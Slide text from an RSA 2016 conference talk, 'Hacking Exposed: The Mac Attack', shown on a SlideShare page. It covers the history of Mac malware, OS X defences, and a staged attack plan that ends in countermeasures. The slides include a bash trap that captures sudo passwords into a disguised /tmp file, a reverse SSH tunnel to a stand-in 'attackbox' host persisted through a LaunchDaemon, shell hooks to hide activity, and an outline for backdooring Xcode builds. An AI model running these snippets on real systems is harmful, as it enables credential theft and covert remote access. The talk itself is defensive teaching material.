SlideShare ist ein Scribd-Unternehmen logo

Hacking Exposed: The Mac Attack

Priyanka Aash
Priyanka Aash

Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient. (Source: RSA USA 2016-San Francisco)

Technologie
1 von 26
Downloaden Sie, um offline zu lesen
SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
#RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
#RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
#RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
#RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
#RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
#RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
#RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
#RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
#RSAC Apple Security Features
#RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
#RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
#RSAC Tradecraft
#RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
#RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
#RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
#RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
#RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
#RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
#RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
#RSAC Putting it all together: Setup & Attack Plan
#RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
#RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
#RSAC DEMO
#RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
#RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL

Empfohlen

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linux
julius77
 
Introduction to iOS Penetration Testing
Introduction to iOS Penetration TestingIntroduction to iOS Penetration Testing
Introduction to iOS Penetration Testing
OWASP
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
Deborah Akuoko
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
anumeha bhatnagar
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
Prathan Phongthiproek
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 

Empfohlen

(03 2013) guide to kali linux
(03 2013) guide to kali linux(03 2013) guide to kali linux
(03 2013) guide to kali linux
julius77
 
Introduction to iOS Penetration Testing
Introduction to iOS Penetration TestingIntroduction to iOS Penetration Testing
Introduction to iOS Penetration Testing
OWASP
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
BASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUXBASIC OVERVIEW OF KALI LINUX
BASIC OVERVIEW OF KALI LINUX
Deborah Akuoko
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
anumeha bhatnagar
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
Prathan Phongthiproek
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
RootedCON
 
How to Analyze an Android Bot
How to Analyze an Android BotHow to Analyze an Android Bot
How to Analyze an Android Bot
Priyanka Aash
 
Kal i linux
Kal i linuxKal i linux
Kal i linux
shamsa222
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
Thomas Roccia
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
RootedCON
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
Kaspersky
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
Thomas Roccia
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov
OWASP Russia
 
Slides null puliya linux basics
Slides null puliya linux basicsSlides null puliya linux basics
Slides null puliya linux basics
Anant Shrivastava
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
RootedCON
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
idsecconf
 
Alice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the netAlice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the net
Chris Hammond-Thrasher
 
Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)
Guy Podjarny
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
Ray Potter
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
Hacks in Taiwan (HITCON)
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
Sebastien Gioria
 
ION Toronto - IETF Update
ION Toronto - IETF UpdateION Toronto - IETF Update
ION Toronto - IETF Update
Deploy360 Programme (Internet Society)
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
Priyanka Aash
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
Priyanka Aash
 

Weitere ähnliche Inhalte

Was ist angesagt?

Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
grecsl
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
Kaspersky
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
Kaspersky
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
RootedCON
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
Ray Potter
 

Was ist angesagt? (19)

Kal i linux
Kal i linuxKal i linux
Kal i linux
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
 
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
Deploying a Shadow Threat Intel Capability at Thotcon on May 6, 2016
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
 
Syrian Malware
Syrian MalwareSyrian Malware
Syrian Malware
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
The Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secureThe Log4Shell Vulnerability – explained: how to stay secure
The Log4Shell Vulnerability – explained: how to stay secure
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov
 
Slides null puliya linux basics
Slides null puliya linux basicsSlides null puliya linux basics
Slides null puliya linux basics
 
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
Ismael Benito & Arnau Gàmez - Hacking Tokens: A Massive PoC [rooted2018]
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
Alice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the netAlice and bob: Love & the most important crypto on the net
Alice and bob: Love & the most important crypto on the net
 
Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)Stranger Danger: Securing Third Party Components (Tech2020)
Stranger Danger: Securing Third Party Components (Tech2020)
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
 
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
【HITCON FreeTalk 2021 - SolarWinds 供應鏈攻擊事件分析】
 
Secure Coding for Java - An Introduction
Secure Coding for Java - An IntroductionSecure Coding for Java - An Introduction
Secure Coding for Java - An Introduction
 
ION Toronto - IETF Update
ION Toronto - IETF UpdateION Toronto - IETF Update
ION Toronto - IETF Update
 

Ähnlich wie Hacking Exposed: The Mac Attack

Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
James Wickett
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
Priyanka Aash
 

Ähnlich wie Hacking Exposed: The Mac Attack (20)

The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
 
Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?Tsunami of Technologies. Are we prepared?
Tsunami of Technologies. Are we prepared?
 

Mehr von Priyanka Aash

Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Priyanka Aash
 

Mehr von Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Kürzlich hochgeladen

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 

Kürzlich hochgeladen (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
AXA XL - Insurer Innovation Award Americas 2024
